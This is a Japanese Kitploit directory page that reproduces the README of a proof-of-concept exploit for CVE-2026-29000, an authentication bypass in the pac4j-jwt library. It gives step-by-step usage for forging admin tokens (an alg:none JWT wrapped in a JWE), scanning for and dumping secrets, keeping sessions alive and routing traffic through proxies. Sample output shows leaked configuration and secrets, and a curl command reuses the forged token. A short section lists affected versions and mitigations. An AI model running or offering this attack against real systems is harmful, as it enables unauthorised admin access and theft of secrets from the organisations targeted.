Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-29000-PoC-Exploit — CVE-2026-29000 – pac4j-jwt 認証バイパス (🔥 CVSS 10.0)。公開鍵JWEラッピングによるワンクリック管理者偽造。設定、ユーザー、秘密情報の漏洩。キープアライブ、プロキシ、カスタムJWKS。⚙️ 教育用PoCエクスプロイトツール。 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-29000-poc-exploit
認証と認可ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育レッドチーミング
GitHubtc4dy/cve-2026-29000-poc-exploit

CVE-2026-29000-PoC-Exploit

CVE-2026-29000 – pac4j-jwt 認証バイパス (🔥 CVSS 10.0)。公開鍵JWEラッピングによるワンクリック管理者偽造。設定、ユーザー、秘密情報の漏洩。キープアライブ、プロキシ、カスタムJWKS。⚙️ 教育用PoCエクスプロイトツール。

32ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

🚀 CVE-2026-29000 - pac4j-jwt 認証バイパスエクスプロイト

Python CVSS License Pentesting

CVE-2026-29000 - JWT alg:none + JWE暗号化によるワンクリック管理者フォージ

📌 概要

このエクスプロイトは、pac4j-jwt ライブラリの重大なCVSS 10.0脆弱性 CVE-2026-29000 を利用します。サーバーの公開JWKSキーを抽出し、alg: none で暗号化されたJWEトークンを偽造することで、完全な認証バイパスを達成し、ワンクリックで完全な管理者権限を獲得します。

🔥 主な機能

  • ✅ 認証不要 - 事前認証エクスプロイト、有効な認証情報不要
  • ✅ 自動JWKS発見 - 15以上のエンドポイントをスキャン、カスタムパス対応
  • ✅ RSAキー抽出 - 公開鍵を取得し、その場でJWK→PEMに変換
  • ✅ JWT + JWE偽造 - alg:none JWTを作成し、サーバー自身の公開鍵でラップ
  • ✅ 完全な管理者トークン - ROLE_ADMIN, admin:true, 有効期限設定可能
  • ✅ 認証バイパス - 8以上の保護されたエンドポイントを自動テスト
  • ✅ インテリジェント情報漏洩 - 20以上の機密APIパスを列挙
  • ✅ セッション持続 - キープアライブスレッドがアクセスを維持
  • ✅ プロキシ対応 - 匿名性のためのHTTP/HTTPSプロキシ
  • ✅ ファイルエクスポート - 偽造トークンと漏洩データをファイルに保存
  • ✅ 再試行メカニズム - 不安定な接続に対する設定可能な再試行
  • ✅ カラー出力 - プロフェッショナルな段階ベースの視覚的フィードバック
  • ✅ 詳細モード - トラブルシューティングのためのデバッグログ
  • ✅ ハードコードされた遅延なし - 再試行バックオフとキープアライブPingのみ

🎯 脆弱なバージョン

ライブラリ影響を受けるバージョン修正済みバージョン
pac4j-jwt< 5.1.5≥ 5.1.5
pac4j-jwt4.x < 4.5.8≥ 4.5.8
pac4j-jwt3.x < 3.18.6≥ 3.18.6

⚠️ 免責事項: このツールは、許可されたセキュリティテストおよびレッドチームの活動専用です。

📦 インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit.git
cd CVE-2026-29000-PoC-Exploit
pip install -r requirements.txt
python exploit.py --help

requirements.txt:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6

🚀 使用法

基本的なワンショットエクスプロイト

root@kitploit:~
python exploit.py --target https://victim.com:8443

偽造トークンと漏洩データを保存

root@kitploit:~
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt

詳細モードとカスタムJWKS

root@kitploit:~
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v

プロキシ有り、キープアライブなし

root@kitploit:~
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive

カスタムキープアライブ間隔

root@kitploit:~
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5

SSL検証有効

root@kitploit:~
python exploit.py -t https://legit.com:8443 --ssl-verify

⚙️ コマンドライン引数

📸 出力例

root@kitploit:~
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt

╔══════════════════════════════════════════════════════════════════════════════╗
║     CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit                 ║
║                    The Educational One‑Click Admin Forge                     ║
║                            CVSS 10.0 - CRITICAL                              ║
╚══════════════════════════════════════════════════════════════════════════════╝

[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key

[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] ✓ Token saved to backdoor.jwe

[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] ✓ Authentication successful! Access granted to /api/users/me

[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] ✓ Leaked: /actuator/env (status 200)
[11:23:18] ✓ Leaked: /api/users (status 200)
[11:23:18] ✓ Leaked: /api/secrets (status 200)
[11:23:18] ✓ Leaked: /config/server (status 200)
[11:23:18] ✓ Captured 4 sensitive endpoints → saved to leak.txt

[11:23:18] Keep‑alive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour – reforge if expired

🧠 仕組み

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  STAGE 1: Public Key Acquisition                                │
│  ├── Discover JWKS endpoint (15+ known paths)                  │
│  ├── Fetch JWK containing RSA public key                       │
│  └── Convert JWK → PEM format                                   │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 2: Token Forging                                         │
│  ├── Create JWT with alg: "none"                               │
│  ├── Inject admin claims (ROLE_ADMIN, admin: true)             │
│  └── Encrypt JWT into JWE using server's public key            │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 3: Authentication Bypass                                 │
│  ├── Send JWE as Bearer token                                   │
│  ├── Test 8+ protected endpoints                               │
│  └── Extract session cookie                                     │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 4: Information Exfiltration                              │
│  ├── Enumerate 20+ sensitive API paths                         │
│  ├── Collect configs, users, secrets, environment              │
│  └── Save all to leak file                                      │
├─────────────────────────────────────────────────────────────────┤
│  Keep-Alive: Ping /api/ping every N seconds                     │
└─────────────────────────────────────────────────────────────────┘

🔧 手動トークン使用法

エクスプロイト後、保存されたJWEトークンをcurlで使用します:

root@kitploit:~
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users

🛡️ 検出と緩和策

検出方法指標
ログ分析監査ログ内のalg:noneのJWT
ネットワーク監視未知のIPからのJWKSエンドポイントリクエスト
バージョンチェックcurl /actuator/info

緩和策:

  • pac4j-jwtを修正済みバージョン(≥5.1.5、≥4.5.8、≥3.18.6)に更新
  • JWTバリデーターでalg:noneのサポートを無効化
  • 厳格なJWE検証を実装
  • 異常なJWT構造を監視
ツールをダウンロード
引数省略形必須デフォルト説明
--target-tはい-対象URL(例:https://example.com:8443)
--jwks-kいいえauto-detectカスタムJWKSエンドポイントパス
--output-oいいえNone偽造JWEトークンをファイルに保存
--leak-lいいえleaked_TIMESTAMP.txt漏洩データをファイルに保存
--verbose-vいいえFalseデバッグ出力を有効化
--proxy-pいいえNoneHTTP/HTTPSプロキシ
--user-agent-uaいいえMozilla/5.0...カスタムUser-Agent
--no-keep-alive-いいえFalseセッションキープアライブを無効化
--delay-いいえ5.0キープアライブPing間隔(秒)
--max-retries-いいえ3失敗したリクエストあたりの最大再試行回数
--ssl-verify-いいえFalseSSL証明書を検証